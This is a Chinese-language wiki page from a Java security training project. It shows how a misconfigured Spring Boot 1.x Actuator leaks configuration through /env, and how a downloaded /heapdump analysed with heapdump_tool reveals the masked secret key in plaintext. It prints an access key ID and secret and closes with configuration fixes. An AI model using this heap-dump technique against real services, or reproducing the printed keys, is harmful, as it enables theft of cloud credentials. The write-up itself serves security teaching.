-
Notifications
You must be signed in to change notification settings - Fork 652
Actuator Information Leakage
JoyChou edited this page Apr 28, 2023
·
2 revisions
Spring版本为1.5.1,在application.properties配置文件里配置了AKSK,再通过Actuator的env接口暴露,由于带有secret字符串,Actuator默认会将其打码。Spring版本是1.x的接口为/env。
/env的application.properties泄露信息:
applicationConfig: [classpath:/application.properties]: {
joychou.security.csrf.method: "POST",
joychou.business.callback: "callback_",
joychou.security.referer.uri: "/jsonp/**",
spring.datasource.url: "jdbc:mysql://localhost:3306/java_sec_code?allowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC",
joychou.security.csrf.enabled: "false",
joychou.security.referer.enabled: "false",
spring.datasource.password: "******",
spring.datasource.driver-class-name: "com.mysql.cj.jdbc.Driver",
management.security.enabled: "false",
endpoints.enabled: "true",
joychou.security.jsonp.referer.check.enabled: "true",
swagger.enable: "true",
spring.datasource.username: "root",
mybatis.mapper-locations: "classpath:mapper/*.xml",
joychou.security.csrf.exclude.url: "/xxe/**, /fastjson/**, /xstream/**, /ssrf/**, /deserialize/**",
joychou.security.jsonp.callback: "callback, _callback",
jsc.accessKey.id: "LTAI5tSAEPX3Z5N2Yt8ogc2y",
joychou.security.referer.host: "joychou.org, joychou.com",
jsc.accessKey.secret: "******",
joychou.no.need.login.url: "/css/**, /js/**, /xxe/**, /rce/**, /deserialize/**, /test/**, /ws/**",
logging.level.org.joychou.mapper: "debug"
}
实际的application.properties配置:
jsc.accessKey.id=LTAI5tSAEPX3Z5N2Yt8ogc2y
jsc.accessKey.secret=W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
Actuator除了secret会打码,还有以下字符,相关代码在org/springframework/boot/actuate/endpoint/Sanitizer.java:
("password", "secret", "key", "token", ".*credentials.*", "vcap_services")通过/env接口获取到了明文的AK和打码后的SK,想办法如何获取明文的SK。下载/heapdump获取堆栈信息,通过heapdump_tool工具获取明文。
➜ java -jar heapdump_tool.jar heapdump2023-04-27-10-25-live4096109267684660351.hprof
[-] file: heapdump2023-04-27-10-25-live4096109267684660351.hprof
[-] Start jhat, waiting...
[-] fing object count: 107053
[-] too many object,please input 0/1 to choose mode.
0. (search data, may can't find some data, can't use function num=,len=,getip,geturl,getfile).
1. (load all object, need wait a few minutes).
> 0
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
> jsc.accessKey.secret
[-] Start process keyword: jsc.accessKey.secret
>> jsc.accessKey.secret -> W1Poxj09wN0Zu6dDsS0on3SIUhOhK7
[-] please input keyword value to search, example: password,re=xxx,len=16,num=0-10,id=0x123a,class=org.xx,all=true,geturl,getfile,getip,shirokey,systemproperties,allproperties,hashtable input q/quit to quit.
Spring1.x的Actuator默认endpoints的开关 endpoints.enabled 打开,但由于Actuator自身安全限制,只能访问/health等部分endpoint接口,这部分接口无安全风险。但可通过 management.security.enabled 控制Actuator安全限制开关,如果关闭安全限制,那么将暴露所有endpoints。所以修复方案可以是:
management.security.enabled=true 或 删除management.security.enabled配置
也可以通过 endpoints.enabled 来控制Actuator的endpoints是否打开:
endpoints.enabled=false